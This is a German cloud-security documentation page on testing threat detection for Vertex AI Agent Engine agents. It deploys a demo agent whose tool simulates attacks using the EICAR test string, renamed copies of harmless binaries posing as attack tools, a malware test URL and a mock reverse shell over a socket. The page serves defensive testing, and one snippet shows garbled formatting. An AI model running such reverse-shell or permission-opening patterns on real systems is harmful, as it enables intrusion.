Agent Engine-Bedrohungserkennung testen

Auf dieser Seite wird erläutert, wie Sie prüfen können, ob die Agent Engine-Bedrohungserkennung funktioniert, indem Sie Detektoren auslösen und auf Ergebnisse prüfen. Die Agent Engine-Bedrohungserkennung ist ein integrierter Dienst von Security Command Center.

Hinweis

Wenn Sie potenzielle Bedrohungen für Ihre Vertex AI Agent Engine-Agents erkennen möchten, muss der Dienst Agent Engine-Bedrohungserkennung aktiviert sein in Security Command Center.

Umgebung einrichten

Wenn Sie die Agent Engine-Bedrohungserkennung testen möchten, richten Sie einen Demo-Agent ein, der schädliche Aktivitäten simuliert.

Projekt erstellen und Shell aktivieren

Wählen Sie ein Google Cloud Projekt für Tests aus oder erstellen Sie eines.

Zum Testen von Detektoren können Sie die Google Cloud Console und Cloud Shell verwenden.

  1. Rufen Sie die Google Cloud Console auf.

    Rufen Sie die Google Cloud Console auf.

  2. Wählen Sie das Projekt aus, das Sie testen möchten.

  3. Klicken Sie auf Cloud Shell aktivieren.

Sie können die Testanleitung auch über eine lokale Shell ausführen.

Vertex AI Agent Engine einrichten

Wenn Sie Vertex AI Agent Engine in diesem Projekt noch nicht verwendet haben, richten Sie die Vertex AI Agent Engine Umgebung ein, bevor Sie beginnen. Notieren Sie sich den Namen des von Ihnen erstellten Cloud Storage-Staging-Buckets. Wir empfehlen außerdem, die Vertex AI Agent Engine Schnellstartanleitung zu lesen, um zu erfahren, wie Sie einen Agent mit dem Vertex AI SDK entwickeln und bereitstellen.

Testskript erstellen

Sie erstellen mehrere Dateien, die zum Bereitstellen eines neuen Agents für Tests verwendet werden. Verwenden Sie dazu einen Texteditor wie nano.

  1. Erstellen Sie eine neue Datei mit dem Namen requirements.txt und dem folgenden Inhalt.

    google-cloud-aiplatform[agent_engines]
    google-adk
    google-genai
    aiohttp
    cloudpickle
    pydantic
    
  2. Erstellen Sie eine neue leere Datei mit dem Namen installation_scripts/install.sh. Für einige Tests muss dieser Datei Inhalt hinzugefügt werden.

  3. Erstellen Sie eine neue Datei mit dem Namen main.py und dem folgenden Inhalt. Ersetzen Sie die Variablen PROJECT_ID, LOCATION und STAGING_BUCKET. Der Name des Staging-Buckets muss das Präfix gs:// enthalten.

    import asyncio
    import os
    import subprocess
    import socket
    import vertexai
    from vertexai import Client, agent_engines
    from google.adk.agents import llm_agent
    from google.adk.sessions.in_memory_session_service import InMemorySessionService
    
    # Replace with your own project, location, and staging bucket.
    LOCATION = "LOCATION"
    PROJECT_ID = "PROJECT_ID"
    # Staging bucket must have gs:// prefix
    STAGING_BUCKET = "STAGING_BUCKET"
    
    client = Client(project=PROJECT_ID, location=LOCATION)
    
    def _run_command(args, **kwargs):
      output = f"Called {' '.join(args)}\n"
      try:
        res = subprocess.run(args, capture_output=True, text=True, **kwargs)
        if res.stdout:
          output += f"Result: {res.stdout.strip()}\n"
        if res.stderr:
          output += f"Error: {res.stderr.strip()}\n"
      except subprocess.TimeoutExpired:
        output += "Command timed out as expected."
      return output
    
    # Tool to simulate threats. The function body will be replaced for individual
    # detector tests.
    def threat_detection_test():
      output = _run_command(["sleep", "60"])
      output += _run_command(["echo", "this is a fake threat"])
      output += _run_command(["sleep", "10"])
      return output
    
    root_agent = llm_agent.Agent(
        model="gemini-2.5-flash",
        name="threat_detection_test_agent",
        description="Runs threat detection test.",
        instruction="""
          You are an agent that runs a threat detection test using a fake malicious
          command.
        """,
        tools=[threat_detection_test],
    )
    
    async def main():
      vertexai.init(
        project=PROJECT_ID,
        location=LOCATION,
        staging_bucket=STAGING_BUCKET,
      )
      app = agent_engines.AdkApp(
          agent=root_agent, session_service_builder=InMemorySessionService
      )
      remote_agent = client.agent_engines.create(
          agent=app,
          config={
              "display_name": "scc_threat_test_agent",
              "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY,
              "requirements": [
                  "google-cloud-aiplatform[agent_engines,adk]",
                  "cloudpickle",
                  "pydantic",
              ],
              "staging_bucket": STAGING_BUCKET,
              "extra_packages": [
                  "installation_scripts/install.sh",
              ],
          },
      )
      print("Deployed agent: ", remote_agent.api_resource.name)
    
      try:
          async for event in remote_agent.async_stream_query(
              user_id="threat_detection_tester",
              message="Run the threat detection test",
          ):
            print(event)
      finally:
          client.agent_engines.delete(name=remote_agent.api_resource.name, force=True)
    
    if __name__ == "__main__":
      asyncio.run(main())
    

Virtuelle Umgebung einrichten

  1. Erstellen und aktivieren Sie eine virtuelle Python-Umgebung.

      python3 -m venv env
      source env/bin/activate
    
  2. Installieren Sie die erforderlichen Abhängigkeiten in der virtuellen Umgebung.

    pip install -r requirements.txt
    

Skript testen

Führen Sie das Skript in der virtuellen Umgebung mit python3 main.py aus. Es dauert einige Minuten, bis der Test-Agent erstellt, bereitgestellt und ausgeführt wird.

Das Skript gibt den Ressourcennamen des bereitgestellten Agents und einige JSON-Objekte aus, darunter eine LLM-Antwort und andere Metadaten. Wenn in dieser Phase Berechtigungs- oder Bereitstellungsfehler auftreten, finden Sie unter Fehlerbehebung weitere Informationen zu den nächsten Schritten.

Detektoren testen

Wenn Sie die Detektoren der Agent Engine-Bedrohungserkennung testen möchten, ersetzen Sie den Code in der Funktion threat_detection_test durch Code, der einen Angriff simuliert. Es kann lange dauern, bis das Skript den Agent bereitstellt und abfragt. Um die Tests zu beschleunigen, können Sie den Inhalt mehrerer dieser Funktionen kombinieren.

Ausführung: Hinzugefügtes schädliches Binärprogramm ausgeführt

Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output += _run_command(["touch", "/tmp/test_mal_file"])
  with open("/tmp/test_mal_file", "w") as f:
    f.write(eicar)
  output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
  output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
  output += _run_command(["sleep", "10"])
  return output

Ausführung: Hinzugefügte schädliche Bibliothek geladen

Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus. Möglicherweise wird vom Vertex AI SDK ein Fehler beim Parsen der Antwort angezeigt, aber das Ergebnis wird trotzdem generiert.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  with open("/tmp/test_mal_lib", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
  output += _run_command(["sleep", "10"])
  return output

Ausführung: Container-Escape

Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
  output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
  output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
  output += _run_command(["sleep", "10"])
  return output

Ausführung: Kubernetes Attack Tool Execution

Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
  output += _run_command(["/tmp/amicontained"])
  output += _run_command(["sleep", "10"])
  return output

Ausführung: Ausführung eines lokalen Ausspähtools

Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
  output += _run_command(["/tmp/linenum.sh"])
  output += _run_command(["sleep", "10"])
  return output

Ausführung: Geändertes schädliches Binärprogramm ausgeführt

Replace the `threat_detection_test` function in the test script, and then run the
test script.

```python
def threat_detection_test():
    eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
    output = _run_command(["sleep", "60"])
    output += _run_command(["chmod", "-R", "777", "/code"])
    with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)

output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```

Ausführung: Geänderte schädliche Bibliothek geladen

Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.

def threat_detection_test():
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output = _run_command(["sleep", "60"])
  output += _run_command(["chmod", "-R", "777", "/code"])
  with open("/code/entrypoint.sh", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
  output += _run_command(["sleep", "10"])
  return output

Schädliche URL beobachtet

Aktualisieren Sie die Datei installation_scripts/install.sh mit dem folgenden Inhalt.

#!/bin/bash
apt-get install -y curl --no-install-recommends

Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.

def threat_detection_test():
  url = "https://testsafebrowsing.appspot.com/s/malware.html"
  output = _run_command(["sleep", "60"])
  output += _run_command(["curl", url])
  output += _run_command(["sleep", "10"])
  return output

Reverse Shell

Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(("8.8.8.8", 53))
  subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
  output += _run_command(["sleep", "10"])
  return output

Nächste Schritte